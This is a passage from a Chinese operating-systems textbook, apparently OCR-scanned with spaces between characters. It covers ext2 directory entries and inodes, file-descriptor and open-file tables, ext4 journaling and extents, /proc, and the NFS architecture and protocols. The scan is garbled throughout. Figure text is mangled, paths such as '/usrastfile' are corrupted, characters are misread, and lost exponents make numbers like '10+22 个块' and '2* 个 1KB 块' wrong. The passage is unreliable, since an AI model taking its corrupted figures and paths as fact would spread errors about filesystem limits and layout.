目录 对 应 的 i 节 点 散布 在 磁盘 块 组 中 。 如 果 有 足够 的 空间 ，ext2 会 把 普通 文件 组 织 到 与 父 目录 相同 的 块 
组 上 ， 而 把 同一 个 块 上 的 数据 文件 组 织 成 初始 文件 i 节 点 。 这 个 思想 来 自 Berkeley 的 快速 文件 系统 
(McKusick 等 人 ，1984) 。 位 图 用 于 快速 确定 在 什么 地 方 分 配 新 的 文件 系统 数据 。 在 分 配 新 的 文件 块 时 ， 
ext2 也 会 给 该 文件 预 分 配 许多 (87>) 额外 的 数据 块 ， 这 样 可 以 减少 将 来 向 该 文件 写 人 数据 时 产生 的 文件 碎 
片 。 这 种 策略 在 整个 磁盘 上 实现 了 文件 系统 负载 平衡 ， 而 且 由 于 对 文件 碎片 进行 了 排列 和 缩减 ， 使 得 它 的 
性 能 也 很 好 。 

要 访问 文件 ， 必 须 首先 使 用 一 个 Linux 系 统 调 用 ， 例 如 open， 该 调用 需要 文件 的 路 径 名 。 解 析 路 径 
名 以 解析 出 单独 的 目录 。 如 果 使 用 相对 路 径 ， 则 从 当前 进程 的 当前 目录 开始 查找 ， 和 否则 就 从 根 目 录 开 始 。 
在 以 上 两 种 情况 中 ， 第 一 个 目录 的 i 节点 很 容易 定位 : 在 进程 描述 符 中 有 指向 它 的 指针 ， 或 者 在 使 用 根 
目录 的 情况 下 ， 它 存储 在 磁盘 上 预定 的 块 上 。 

目录 文件 允许 不 超过 255 个 字符 的 文件 名 ， 如 图 10-32 所 示 。 每 一 个 目录 都 由 整数 个 磁盘 块 组 成 ， 这 
样 目录 就 可 以 整体 写 人 磁盘 。 在 一 个 目录 中 , 文件 和 子 目录 的 目录 项 是 未 排序 的 ， 并 且 一 个 紧 挨 着 一 个 。 
目录 项 不 能 跨越 磁盘 块 ， 所 以 通常 在 每 个 磁盘 块 的 尾部 会 有 部 分 未 使 用 的 字 节 。 

图 10-32 中 的 每 个 目录 项 由 四 个 固定 长 度 的 域 和 一 个 可 变 长 度 的 域 组 成 。 第 一 个 域 是 i 节 点 号 ， 文 件 
colossal 的 i 节 点 号 是 19， 文 件 voluminous 的 i 节 点 号 是 42， 目 录 bigdir 的 i 节 点 号 是 88。 接 下 来 是 rec_len 域 ， 
标明 该 目录 项 的 大 小 (以 字 节 为 单位 )， 可 能 包括 名 字 后 面 的 一 些 填充 。 在 名 字 以 未 知 长 度 填 充 时 ， 这 
个 域 被 用 来 寻找 下 一 个 目录 项 。 这 也 是 图 10-32 中 箭头 的 含义 。 接 下 来 是 类 型 域 : 文件 、 目 录 等 。 最 后 
一 个 固定 域 是 文件 名 的 长 度 〈 以 字 节 为 单位 )， 在 例子 中 是 8、10 和 6。 最 后 是 文件 名 ， 文 件 名 以 字 节 0 结 
束 ， 并 被 填充 到 32 字 节 边 界 。 额 外 的 填充 可 以 在 此 之 后 。 

在 图 10-32b 中 ， 我 们 看 到 的 是 文件 voluminous 的 目录 项 被 移 除 后 同一 个 目录 的 内 容 。 这 是 通过 增加 
colossal 的 域 的 长 度 ， 将 voluminous 以 前 所 在 的 域 变 为 第 一 个 目录 项 的 填充 。 当 然 ， 这 个 填充 可 以 用 来 作 
为 后 续 的 目录 项 。 

由 于 目录 是 按 线性 顺序 查找 的 ， 要 找到 一 个 位 于 大 目录 末尾 的 目录 项 会 耗费 相当 长 的 时 间 。 因 此 ， 
系统 为 近期 访问 过 的 目录 维护 一 个 缓存 。 该 缓存 使 用 文件 名 进行 查找 ， 如 果 命中 ， 那 么 就 可 以 避免 费时 
的 线性 查找 。 组 成 路 径 的 每 个 部 分 都 在 目录 缓存 中 保存 一 个 dentry 对 象 ， 并 且 通 过 它 的 i 节 点 查找 到 后 续 
的 路 径 元 素 的 目录 项 ， 直 到 找到 真正 的 文件 i 节 点 。 
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i 节 点 号 

项 大 小 
类 型 
文件 名 长 度 






a) |19! !'F;8'colossal|42 ;Fi10; voluminous |88! 'D!6' bigdir 







b) |19! ，F ! 8 , colossal 88: ‘pie! bigdir 






图 10-32 a) 一 个 含有 三 个 文件 的 Linux 目 录 ; b) 文件 voluminous 被 删除 后 的 目录 


例如 ， 要 通过 绝对 路 径 名 来 查找 一 个 文件 (如: /usrastfile ) ， 需 要 经 过 如 下 步骤 。 首先 ， 系 统 定 
位 根 目录 ， 它 通常 使 用 2 号 i 节点 (特别 是 当 1 号 i 节点 被 用 来 处 理 磁 盘 坏 块 的 时 候 )。 系 统 在 目录 缓存 中 存 
放 一 条 记录 以 便 将 来 对 根 目录 的 查找 。 然 后 ， 在 根 目 录 中 查找 字符 串 “usr”， 得 到 /usr 目 录 的 i 节点 号 。 
/usr 目 录 的 i 节点 号 同样 也 存 人 目录 缓存 。 然 后 这 个 i 节点 被 取出 ， 并 从 中 解析 出 磁盘 块 ， 这 样 就 可 读 取 
/usr 目 录 并 查找 字符 申 “ast”。 一 旦 找到 这 个 目录 项 ， 目 录 /usr/ast 的 i 节点 号 就 可 以 从 中 获得 。 有 了 
/usr/ast 的 i 节点 号 ， 就 可 以 读 取 i 节点 并 确定 目录 所 在 的 磁盘 块 。 最 后 ， 从 /usr/ast 目 录 查 找 “file” 并 确定 
其 i 节点 号 。 因 此 ， 使 用 相对 地 址 不 仅 对 用 户 来 说 更 加 方便 ， 而且 也 为 系统 节省 了 大 量 的 工作 。 

如 果 文 件 存 在 ， 那 么 系统 提取 其 i 节点 号 并 以 它 为 索引 在 i 节点 表 (在 磁盘 上 ) 中 定位 相应 的 节点， 
并 装 入 内 存 。i 节 点 被 存放 在 i 节点 表 中 ， 其 中 i 节点 表 是 一 个 内 核 数据 结构 ， 用 于 保存 所 有 当前 打开 的 
文件 和 目录 的 i 节点 。i 节 点 表 项 的 格式 至 少 要 包含 stat 系 统 调用 返回 的 所 有 域 ， 以 保证 stat 正 常 运 行 
( 见 图 10-28)。 图 10-33 中 列 出 了 i 节点 结构 中 由 Linux 文 件 系统 层 支 持 的 一 些 域 。 实 际 的 i 节点 结构 包含 更 
多 的 域 ， 这 是 由 于 该 数据 结构 也 用 于 表示 目录 、 设 备 以 及 其 他 特殊 文件 。i 节 点 结构 中 还 包含 了 一 些 为 
将 来 的 应 用 保留 的 域 。 历 史 已 经 表明 未 使 用 的 位 不 会 长 时 间 保 持 这 种 方式 。 


[Mode | 2 | 文件 类 型 保护 位 , semid 和 setgid 们 | 
文件 属 主 的 UID 
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图 10-33 Linux 的 节点 结构 中 的 一 些 域 
现在 来 看 看 系统 如 何 读 取 文件 。 对 于 调用 了 read 系 统 调用 的 库 函 数 的 一 个 典型 使 用 是 : 
n = read(fd, buffer, nbytes); 


当 内 核 得 到 控制 权时 ， 它 需要 从 这 三 个 参数 以 及 内 部 表 中 与 用 户 有 关 的 信息 开始 。 内 部 表 中 的 项 目 之 一 
是 文件 描述 符 数组 。 文 件 描述 符 数组 用 文件 描述 符 作 为 索引 并 为 每 一 个 打开 的 文件 保存 一 个 表 项 (最 多 
达到 最 大 值 ， 通 常 默认 是 32 个 ) 。 
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这 里 的 思想 是 从 一 个 文件 描述 符 开始 ， 找 到 文件 对 应 的 i 节 点 为 止 。 考 虑 一 个 可 能 的 设计 : 在 文件 
描述 符 表 中 存放 一 个 指向 i 节 点 的 指针 。 尽 管 这 很 简单 ， 但 不 幸 的 是 这 个 方法 不 能 奏效 。 其 中 存在 的 问 
题 是 : 与 每 个 文件 描述 符 相关 联 的 是 用 来 指明 下 一 次 读 ( 写 ) 从 哪个 字 节 开始 的 文件 读 写 位 置 ， 它 该 放 
在 什么 地 方 ? 一 个 可 能 的 方法 是 将 它 放 到 i 节点 表 中 。 但 是 ， 当 两 个 或 两 个 以 上 不 相关 的 进程 同时 打开 
同一 个 文件 时 ， 由 于 每 个 进程 有 自己 的 文件 读 写 位 置 ， 这 个 方法 就 失效 了 。 

另 一 个 可 能 的 方法 是 将 文件 读 写 位 置 放 到 文件 描述 符 表 中 。 这 样 ， 每 个 打开 文件 的 进程 都 有 自己 的 
文件 读 写 位置 。 不 幸 的 是 ， 这 个 方法 也 是 失败 的 ， 但 是 其 原因 更 加 微妙 并 且 与 Linux 的 文件 共享 的 本 质 
有 关 。 考 虑 一 个 shell 脚 本 s， 它 由 顺序 执行 的 两 个 命令 pl 和 p2 组 成 。 如 果 该 shell 脚 本 在 命令 行 
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下 被 调用 ， 我 们 预期 p1 将 它 的 输出 写 到 x 中 ， 然 后 p2 也 将 输出 写 到 x 中 ， 并 且 从 p1 结 束 的 地 方 开始 。 

当 shell 生 成 p1 时 ，x 初 始 是 空 的 ， 从 而 p1 从 文件 位 置 0 开 始 写 人 。 然 而 ， 当 p1 结 束 时 就 必须 通过 某 种 
机 制 使 得 p2 看 到 的 初始 文件 位 置 不 是 0 (如 果 将 文件 位 置 存放 在 文件 描述 符 表 中 ，p2 将 看 到 0) ， 而 是 pl 
结束 时 的 位 置 。 

实现 这 一 点 的 方法 如 图 10-34 所 示 。 实 现 的 技巧 是 在 文件 描述 符 表 和 i 节点 表 之 间 引 入 一 个 新 的 表 ， 
叫 作 打开 文件 描述 表 ， 并 将 文件 读 写 位 置 (以 及 读 / 写 位 ) 放 到 里 面 。 在 这 个 图 中 ， 父 进程 是 shell 而 子 进 
程 首先 是 p1 然 后 是 p2。 当 shell 生 成 pl1 时 ，p1 的 用 户 结构 (包括 文件 描述 符 表 ) 是 shell 的 用 户 结构 的 一 个 
副本 ， 因 此 两 者 都 指向 相同 的 打开 文件 描述 表 的 表 项 。 当 pl 结束 时 ，shell 的 文件 描述 符 仍 然 指 向 包含 p1 
的 文件 位 置 的 打开 文件 描述 。 当 shell 生 成 p2 时 ， 新 的 子 进程 自动 继承 文件 读 写 位 置 ， 甚 至 p2 和 shell 都 不 
需要 知道 文件 读 写 位 置 到 底 是 在 哪里 。 

然而 ， 当 不 相关 的 进程 打开 该 文件 时 ， 它 将 得 到 自己 的 打开 文件 描述 表 项 ， 以 及 自己 的 文件 读 写 位 
置 ， 而 这 正 是 我 们 所 需要 的 。 因 此 ， 打 开 文 件 描述 表 的 重点 是 允许 父 进程 和 子 进程 共享 一 个 文件 读 写 位 
置 ， 而 给 不 相关 的 进程 提供 各 自私 有 的 值 。 

再 来 看 读 操作 ， 我 们 已 经 说 明了 如 何 定位 文件 读 写 位 置 和 i 节 点 。i 节 点 包含 文件 前 12 个 数据 块 的 磁 
盘 地 址 。 如 果 文 件 位 置 是 在 前 12 个 块 ， 那 么 这 个 块 被 读 入 并 且 其 中 的 数据 被 复制 给 用 户 。 对 于 长 度 大 于 
12 个 数据 块 的 文件 ，i 节 点 中 有 一 个 域 包 含 一 个 一 级 间接 块 的 磁盘 地 址 ， 如 图 10-34 所 示 。 这 个 块 含有 更 
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图 10-34 文件 描述 符 表 、 打 开 文 件 描述 表 和 i 节 点 表 之 间 的 关系 
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多 的 磁盘 块 的 磁盘 地 址 。 例 如 ， 如 果 一 个 磁盘 块 大 小 为 IKB 而 磁盘 地 址 长 度 是 4 字 节 ， 那 么 这 个 一 级 间 
接 块 可 以 保存 256 个 磁盘 地 址 。 因 此 这 个 方案 只 对 于 总 长 度 在 268KB 以 内 的 文件 适用 。 

除 此 之 外 ， 还 使 用 一 个 二 级 间接 块 。 它 包含 256 个 一 级 间接 块 的 地 址 ， 每 个 一 级 间接 块 保存 256 个 数 
据 块 的 地 址 。 这 个 机 制 能 够 处 理 10+22 个 块 (67 119 104 字 节 )。 如 果 这 样 仍然 不 够 ， 那 么 i 节点 为 三 级 间 
接 块 留 下 了 空间 ， 三 级 间接 块 的 指针 指向 许多 二 级 间接 块 。 这 个 寻 址 方案 能 够 处 理 大 小 为 2* 个 1KB 块 
(16GB) 的 文件 。 对 于 块 大 小 是 8KB 的 情况 ， 这 个 寻 址 方案 能 够 支持 最 大 64TB 的 文件 。 

3. Linux ext4 文 件 系 统 

为 了 防止 由 系统 崩溃 和 电源 故障 造成 的 数据 丢失 ，ext2 文 件 系 统 必须 在 每 个 数据 块 创建 之 后 立即 将 
其 写 出 到 磁盘 上 。 必 有 需 的 磁盘 磁头 寻 道 操作 导致 的 延迟 是 如 此 之 长 以 至 于 性 能 差 得 无 法 让 人 接受 。 因 此 ， 
写 操作 被 延迟 ， 对 文件 的 改动 可 能 在 30 秒 内 都 不 会 提交 给 磁盘 ， 而 相对 于 现代 的 计算 机 硬件 来 说 ， 这 是 
一 段 相当 长 的 时 间 间 隔 。 

为 了 增强 文件 系统 的 健壮 性 ，Linux 依 靠 日 志文 件 系统 。ext3 是 一 个 日 志文 件 系统 ， 它 在 ext2 文 件 系 
统 之 上 做 了 改进 。ext4 是 ext3 的 改进 ， 也 是 一 个 日 志文 件 系 统 ， 但 不 同 于 ext3， 它 改变 了 ext3 所 采用 的 块 
寻 址 方案 ， 从 而 同时 支持 更 大 的 文件 和 更 大 的 整体 文件 系统 。 我 们 后 面 将 介绍 它 的 一 些 特点 。 

这 种 文件 系统 背后 的 基本 思想 是 维护 一 个 日 志 ， 该 日 志 顺 序 记录 所 有 文件 系统 操作 。 通 过 顺序 写 出 
文件 系统 数据 或 元 数据 (i 节点 ， 超 级 块 等 ) 的 改动 ， 该 操作 不 必 忍 受 随机 磁盘 访问 时 磁头 移动 带 来 的 
开销 。 最 后 ， 这 些 改动 将 被 写 到 适当 的 磁盘 地 址 ， 而 相应 的 日 志 项 可 以 被 丢弃 。 如 果 系 统 崩溃 或 电源 故 
障 在 改动 提交 之 前 发 生 ， 那 么 在 重启 动 过 程 中 ， 系 统 将 检测 到 文件 系统 没有 被 正确 地 外 载 。 然 后 系统 记 
历 日 志 ， 并 执行 日 志 记录 所 描述 的 文件 系统 改动 。 

ext4 设 计 成 与 ext2 和 ext3 高 度 兼容 ， 尽 管 其 核心 数据 结构 和 磁盘 布局 被 修改 过 。 此 外 ， 一 个 作为 ext2 
系统 被 卸载 的 文件 系统 随后 可 以 作为 ext4 系 统 被 挂 载 并 提供 日 志 能 力 。 

日 志 是 一 个 以 环形 缓冲 器 形式 组 织 的 文件 。 日 志 可 以 存储 在 主 文件 系统 所 在 的 设备 上 也 可 以 存储 在 
其 他 设备 上 。 由 于 日 志 操 作 本 身 不 被 日 志 记 录 ， 这 些 操 作 并 不 是 被 日 志 所 在 的 ext4 文 件 系 统 处 理 的 ， 而 
是 使 用 一 个 独立 的 日 志 块 设备 (Journaling Block Device, JBD) 来 执行 日 志 的 读 / 写 操作 。 

JBD 支 持 三 个 主要 数据 结构 : 日 志 记 录 、 原 子 操作 处 理 和 事务 。 一 个 日 志 记 录 描 述 一 个 低级 文件 系 
统 操作 ， 该 操作 通常 导致 块 内 变化 。 鉴 于 系统 调用 (如 write) 包含 多 个 地 方 的 改动 i 节点 、 现 有 的 文 
件 块 、 新 的 文件 块 、 空 闲 块 列表 等 ， 所 以 将 相关 的 日 志 记 录 按 照 原子 操作 分 成 组 。Ext3 将 系统 调用 过 程 的 
起 始 和 结束 通知 JBD， 这 样 JBD 能 够 保证 一 个 原子 操作 中 的 所 有 日 志 记录 或 者 都 被 应 用 ， 或 者 没有 一 个 被 
应 用 。 最 后 ， 主 要 从 效率 方面 考虑 ，JBD 将 原子 操作 的 汇集 作为 事务 对 待 。 一 个 事务 中 日 志 记 录 是 连续 存 
储 的 。 仅 当 一 个 事务 中 的 所 有 日 志 记 录 都 被 安全 提交 到 磁盘 后 ，JBD 才 允许 日 志文 件 的 相应 部 分 被 丢弃 。 

把 每 个 磁盘 改动 的 日 志 记 录 项 写 到 磁盘 可 能 开销 很 大 ，ext4 可 以 配置 为 保存 所 有 磁盘 改动 的 日 志 或 
者 仅仅 保存 文件 系统 元 数据 (i 节点 、 超 级 块 等 ) 改动 的 日 志 。 只 记录 元 数据 会 使 系统 开销 更 小 ， 性 能 
更 好 ， 但 是 不 能 保证 文件 数据 不 会 损坏 。 一 些 其 他 的 日 志文 件 系统 仅仅 维护 关于 元 数据 操作 的 日 志 〈 例 
如 ，SGI 的 XFS ) 。 此 外 ， 该 日 志 的 可 靠 性 还 可 以 进一步 通过 校 验 而 改善 。 

相 比 之 前 的 文件 系统 ，ext4 的 主要 改动 在 于 使 用 了 盘 区 。 盘 区 代表 连续 的 存储 块 ， 例 如 128MB 的 连 
续 4KB 的 块 ， 而 ext2 采 用 的 是 单个 存储 块 。ext4 并 不 要 求 对 每 个 存储 块 进行 元 数据 操作 ， 这 点 不 像 之 前 
的 文件 系统 。 这 个 策略 也 为 大 型 文件 存储 减少 了 碎片 。 其 结果 是 ，ext4 可 以 提供 更 快 的 文件 系统 操作 ， 
并 支持 更 大 的 文件 和 文件 系统 。 例 如 ， 对 于 1 KB 的 块 大 小 ，ext4 将 最 大 的 文件 大 小 从 16GB 增 加 到 16TB， 
最 大 的 文件 系统 大 小 增加 到 1EB (Exabyte)。 

4. /proc 文 件 系统 

另 一 个 Linux 文 件 系统 是 /proc (process) 文件 系统 。 其 思想 来 自 于 Bell 实 验 室 开 发 的 第 8 版 UNIX， 
后 来 被 4.4BSD 和 System V 采 用 。 不 过 ，Linux 在 几 个 方面 对 该 思想 进行 了 扩充 。 其 基本 概念 是 为 系统 中 
的 每 个 进程 在 /proc 中 创建 一 个 目录 。 目 录 的 名 字 是 进程 PID 的 十 制 数 值 。 例 如 ，/proc/619 是 与 PID 为 619 
的 进程 相对 应 的 目录 。 在 该 目录 下 是 进程 信息 的 文件 ， 如 进程 的 命令 行 、 环 境 变量 和 信号 掩 码 等 。 事 实 
上 上， 这些 文件 在 磁盘 上 并 不 存在 。 当 读 取 这 些 文件 时 ， 系 统 按 需 从 进程 中 抽取 这 些 信息 ， 并 以 标准 格式 
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将 其 返回 给 用 户 。 

许多 Linux 扩 展 与 /proc 中 其 他 的 文件 和 目录 相关 。 它 们 包含 各 种 各 样 的 关于 CPU、 磁 盘 分 区 、 设 备 、 
中 断 向 量 、 内 核 计 数 器 、 文 件 系统 、 已 加 载 模块 等 信息 。 非 特权 用 户 可 以 读 取 很 多 这 样 的 信息 ， 于 是 就 
可 以 通过 一 种 安全 的 方式 了 解 系统 的 行为 。 其 中 的 部 分 文件 可 以 被 写 入 ， 以 达到 改变 系统 参数 的 目的 。 


10.6.4 NFS: 网 络 文件 系统 

网 络 在 Linux 中 起 着 重要 作用 ， 在 UNIX 中 也 是 如 此 一 一 自从 网 络 出 现 开始 (第 一 个 UNIX 网 络 是 为 
了 将 新 的 内 核 从 PDP-11/70 转 移 到 Interdata 8/32 上 而 建立 的 ) 。 本 节 将 考察 Sun Microsystem 的 NFS (网 络 
文件 系统 )。 该 文件 系统 应 用 于 所 有 的 现代 Linux 系 统 中 ， 其 作用 是 将 不 同 计算 机 上 的 不 同文 件 系统 连接 
成 一 个 逻辑 整体 。 当 前 主流 的 NFS 实 现 是 1994 年 提出 的 第 3 版 。NFS 第 4 版 在 2000 年 提出 ， 并 在 前 一 个 
NFS 体 系 结构 上 做 了 一 些 增强 。NFS 有 三 个 方面 值得 关注 : 体系 结构 、 协 议和 实现 。 我 们 现在 将 依次 考 
察 这 三 个 方面 ， 首 先是 简化 的 NFS 第 3 版 ， 然 后 简要 探讨 第 4 版 所 做 的 增强 。 

1. NFS 体 系 结构 

NFS 背 后 的 基本 思想 是 允许 任意 选 定 的 一 些 客户 端 和 服务 器 共享 一 个 公共 文件 系统 。 在 很 多 情况 下 ， 
所 有 的 客户 端 和 服务 器 都 在 同一 个 局 域 网 中 ， 但 这 并 不 是 必需 的 。 如 果 服 务 器 距离 客户 端 很 远 ，NFS 也 
可 以 在 广域网 上 运行 。 简 单 起 见 ， 我 们 还 是 说 客户 端 和 服务 器 ， 就 好 像 它们 位 于 不 同 的 机 器 上 ， 但 实际 
上 ，NFS 人 允许 一 台 机 器 同时 既是 客户 端 又 是 服务 器 。 

每 一 个 NFS 服 务 器 都 导出 一 个 或 多 个 目录 供 远 程 客户 端 访 问 。 当 一 个 目录 可 用 时 ， 它 的 所 有 子 目录 也 
都 可 用 ， 正 因 如 此 ， 通 常 整个 目录 树 通常 作为 一 个 单元 导出 。 服 务 器 导出 的 目录 列表 用 一 个 文件 来 维护 ， 
通常 是 /etc/exports。 因 此 服务 器 启动 后 这 些 目录 可 以 被 自动 地 导出 。 客 户 端 通过 挂 载 这 些 导 出 的 目录 来 访问 
它们 。 当 一 个 客户 端 挂 载 了 一 个 (远程) 目录 ， 该 目录 就 成 为 客户 端 目录 层次 的 一 部 分 ， 如 图 10-35 所 示 。 

在 这 个 例子 中 ， 客 户 端 1 将 服务 器 1 的 bin 目 录 挂 载 到 客户 端 1 自己 的 bin 目 录 。 因 此 它 现 在 可 以 用 
/bin/sh 引 用 shell 并 获得 服务 器 的 shell。 无 磁盘 工作 站 通常 只 有 一 个 框架 文件 系统 (在 RAM 中 )， 它 从 远 
程 服务 器 中 得 到 所 有 的 文件 ， 就 像 上 例 中 一 样 。 类 似 地 ， 客 户 端 1 将 服务 器 2 中 的 /projects 目 录 挂 载 到 自 
己 的 /usr/asVwork 目 录 ， 因 此 它 用 usrastwork/projl/a 就 可 以 访问 文件 a。 最 后 ， 客 户 端 2 也 挂 载 了 projects 
目录 ， 它 可 以 用 /mnt/projl/a 访 问 文件 a。 从 这 里 可 以 看 到 ， 由 于 不 同 的 客户 端 将 文件 挂 载 到 各 自 目录 树 
中 不 同 的 位 置 ， 同 一 个 文件 在 不 同 的 客户 端 有 不 同 的 名 字 。 对 客户 端 来 说 挂 载 点 是 完全 位 于 本 地 的 ， 服 
务 器 不 会 知道 文件 在 任何 一 个 客户 端 中 的 挂 载 点 。 


1 号 客户 机 


cat cp Is mv sh 





1 号 服务 器 2 号 服务 器 
图 10-35 远程 挂 载 的 文件 系统 的 例子 。 图 中 的 方 框 表示 目录 ， 圆 形 表示 文件 
2. NFS 协 议 


由 于 NFS 的 目标 之 一 是 支持 异 构 系 统 ， 客 户 端 和 服务 器 可 能 在 不 同 硬件 上 运行 不 同 操作 系统 ， 因 此 
对 客户 端 和 服务 器 之 间 的 接口 给 予 明确 定义 是 很 关键 的 。 只 有 这 样 ， 才 有 可 能 让 任何 一 个 新 的 客户 端 能 
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够 跟 现 有 的 服务 器 一 起 正确 工作 ， 反 之 亦 然 。 

NFS 通 过 定义 两 个 客户 端 - 服 务 器 协议 来 实现 这 一 目标 。 协 议 就 是 从 客户 端 发 送 到 服务 器 的 一 组 请 
求 以 及 从 服务 器 返回 给 客户 端的 响应 的 集合 。 

第 一 个 NFS 协 议 处 理 挂 载 。 客 户 端 可 以 向 服务 器 发 送 路 径 名 ， 请 求 服务 器 许可 将 该 目录 挂 载 到 自己 
的 目录 层次 的 某 个 地 方 。 由 于 服务 器 并 不 关心 目录 将 被 挂 载 到 何 处 ,因此 请 求 消息 中 并 不 包含 挂 载 地 址 。 
如 果 路 径 名 是 合法 的 并 且 该 目录 已 被 导出 ， 那 么 服务 器 向 客户 端 返回 一 个 文件 句柄 。 这 个 文件 句柄 中 的 
域 唯一 地 标识 了 文件 系统 类 型 、 磁 盘 、 目 录 的 i 节 点 号 以 及 安全 信息 等 。 随 后 对 已 挂 载 目 录 及 其 子 目录 
中 文件 的 读 写 都 使 用 该 文件 句柄 。 

Linux 启 动 时 会 在 进入 多 用 户 之 前 运行 shell 脚 本 /etc/rc。 可 以 将 挂 载 远程 文件 系统 的 命令 写 人 该 脚本 
中 ， 这 样 就 可 以 在 允许 用 户 登录 之 前 自动 挂 载 必要 的 远程 文件 系统 。 此 外 ， 大 部 分 Linux 版 本 也 支持 自 
动 挂 载 。 这 个 特性 允许 一 组 远程 目录 跟 一 个 本 地 目录 相关 联 。 当 客户 端 启动 时 ， 并 不 挂 载 这 些 远 程 目录 
(甚至 不 与 它们 所 在 的 服务 器 进行 联络 )。 相 反 ， 在 第 一 次 打开 远程 文件 时 ， 操 作 系 统 向 每 个 服务 器 发 送 
一 条 信息 。 第 一 个 响应 的 服务 器 胜出 ， 其 目录 被 挂 载 。 

相对 于 通过 /etc/rc 文 件 进行 静态 挂 载 ， 自 动 挂 载 具 有 两 个 主要 优势 。 第 一 ， 如 果 /etc/rc 中 列 出 的 某 
个 NFS 服 务 器 出 了 故障 ， 那 么 客户 端 将 无 法 启动 ， 或 者 至 少 会 带 来 一 些 困 难 、 延 迟 以 及 很 多 出 错 信息 。 
如 果 用 户 当前 根本 就 不 需要 这 个 服务 器 ， 那 么 刚才 的 工作 就 白费 了 。 第 二 ， 人 允许 客户 端 并 行 地 尝试 一 组 
服务 器 ， 可 以 实现 一 定 程度 的 容错 性 (因为 只 要 其 中 一 个 是 在 运行 的 就 可 以 了 )， 而 且 性 能 也 可 以 得 到 
提高 (通过 选择 第 一 个 响应 的 服务 器 一 一 推测 该 服务 器 负载 最 低 ) 。 

另 一 方面 ， 我 们 默认 在 自动 挂 载 时 所 有 可 选 的 文件 系统 都 是 完全 相同 的 。 由 于 NFS 不 提供 对 文件 或 
目录 复制 的 支持 ， 用 户 需 要 自己 确保 所 有 这 些 文件 系统 都 是 相同 的 。 因 此 ， 自 动 挂 载 多 数 情况 下 被 用 于 
包含 系统 二 进 制 文件 和 其 他 很 少 改动 的 文件 的 只 读 文件 系统 。 

第 二 个 NFS 协 议 是 为 访问 目录 和 文件 设计 的 。 客 户 端 可 以 通过 向 服务 器 发 送 消息 来 操作 目录 和 读 写 
文件 。 客 户 端 也 可 以 访问 文件 属性 ， 如 文件 模式 、 大 小 、 上 次 修改 时 间 。NFS 支 持 大 多 数 的 Linux 系 统 
调用 ,但 是 也 许 很 让 人 惊讶 的 是 ，open 和 close 不 被 支持 。 

不 支持 open 和 close 操 作 并 不 是 一 时 疏忽 ， 而 纯粹 是 有 意 为 之 。 没 有 必要 在 读 一 个 文件 之 前 先 打开 它 ， 
也 没有 必要 在 读 完 后 关闭 它 。 读 文件 时 ， 客 户 端 向 服务 器 发 送 一 个 包含 文件 名 的 lookup 消 息 ， 请 求 查询 该 
文件 并 返回 一 个 标识 该 文件 的 文件 句柄 ( 即 包含 文件 系统 标识 符 i 节 点 号 以 及 其 他 数据 )。 与 open 调 用 不 同 ， 
lookup 操 作 不 向 系统 内 部 表 中 复制 任何 信息 。read 调 用 包含 要 读 取 的 文件 的 文件 句柄 ， 起 始 偏 移 量 和 需要 
的 字 节 数 。 每 个 这 样 的 消息 都 是 自 包 含 的 。 这 个 方案 的 优势 是 在 两 次 read 调 用 之 间 ， 服 务 器 不 需要 记 住 任 
何 关于 已 打开 的 连接 的 信息 。 因 此 ， 如 果 一 个 服务 器 在 崩溃 之 后 恢复 ， 所 有 关于 已 打开 文件 的 信息 都 不 会 
丢失 ， 因 为 这 些 信 息 原 本 就 不 存在 。 像 这 样 不 维护 打开 文件 的 状态 信息 的 服务 器 称 作 是 无 状态 的 。 

不 幸 的 是 ，NFS 方 法 使 得 难以 实现 精确 的 Linux 文 件 语义 。 例 如 ， 在 Linux 中 一 个 文件 可 以 被 打开 并 锁定 以 
防止 其 他 进程 对 其 访问 。 当 文件 关闭 时 ， 锁 被 释放 。 在 一 个 像 NFS 这 样 的 无 状态 服务 器 中 ， 锁 不 能 与 已 打开 的 
文件 相关 联 ， 这 是 因为 服务 器 不 知道 哪些 文件 是 打开 的 。 因 此 ，NFS 需 要 一 个 独立 的 ， 附 加 的 机 制 来 进行 加 锁 
处 理 。 

NFS 使 用 标准 UNIX 保 护 机 制 ， 为 文件 属 主 、 组 和 其 他 用 户 使 用 读 、 写 、 执 行 位 (rwx bits) (在 第 1 
章 中 提 到 过 ， 将 在 下 面 详细 讨论 )。 最 初 ， 每 个 请 求 消息 仅仅 包含 调用 者 的 用 户 ID 和 组 IDD，NFS 服 务 器 
用 它们 来 验证 访问 。 实 际 上 ， 它 信任 客户 端 ， 认 为 客户 端 不 会 进行 欺骗 。 若 干 年 来 的 经 验 充 分 支持 了 这 
样 一 个 假设 。 现 在 ， 可 以 使 用 公 钥 密码 系统 建立 一 个 安全 密 钥 ， 在 每 次 请 求 和 应 答 中 使 用 它 验 证 客户 端 
和 服务 器 。 启 用 这 个 选项 后 ， 恶 意 的 客户 端 就 不 能 伪装 成 另 一 个 客户 端 了 ， 因 为 它 不 知道 其 他 客户 端的 
安全 密 钥 。 

3. NFS 实 现 

尽管 客户 端 和 服务 器 代码 实现 独立 于 NFS 协 议 ， 但 大 多 数 Linux 系 统 使 用 一 个 类 似 图 10-36 所 示 的 三 
层 实 现 。 顶 层 是 系统 调用 层 ， 这 一 层 处 理 open、read 和 close 之 类 的 调用 。 在 解析 调用 和 参数 检查 结束 
后 ， 调 用 第 二 层 一 一 虚拟 文件 系统 (VFS) B. 
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图 10-36 NFS 层 次 结构 


VFS 层 的 任务 是 维护 一 个 表 ， 每 个 打开 的 文件 在 该 表 中 有 一 个 表 项 。VFS 层 为 每 个 打开 文件 保存 一 
个 虚拟 i 节点 (或 称 为 v-node)。v 节 点 用 来 说 明文 件 是 本 地 文件 还 是 远程 文件 。 对 于 远程 文件 ，v 节 点 提 
供 足 够 的 信息 使 客户 端 能 够 访问 它们 。 对 于 本 地 文件 ， 则 记录 其 所 在 的 文件 系统 和 文件 的 i 节点 ， 这 是 
因为 现代 Linux 系 统 能 支持 多 文件 系统 (例如 ext2fs、/proc、FAT 等 )。 尽 管 VFS 是 为 了 支持 NFS 而 发 明 的 ， 
但 多 数 现代 Linux 系 统 将 VFS 作 为 操作 系统 的 一 个 组 成 部 分 ， 不 管 有 没有 使 用 NFS。 

为 了 理解 如 何 使 用 v 节 点 ， 我 们 来 跟踪 一 组 顺序 执行 的 mount、open 和 read 调 用 。 要 挂 载 一 个 远程 
文件 系统 ， 系 统管 理 员 (或 /etc/rc) 调用 mount 程 序 ， 并 指明 远程 目录 、 远 程 目录 将 被 挂 载 到 哪个 本 地 目 
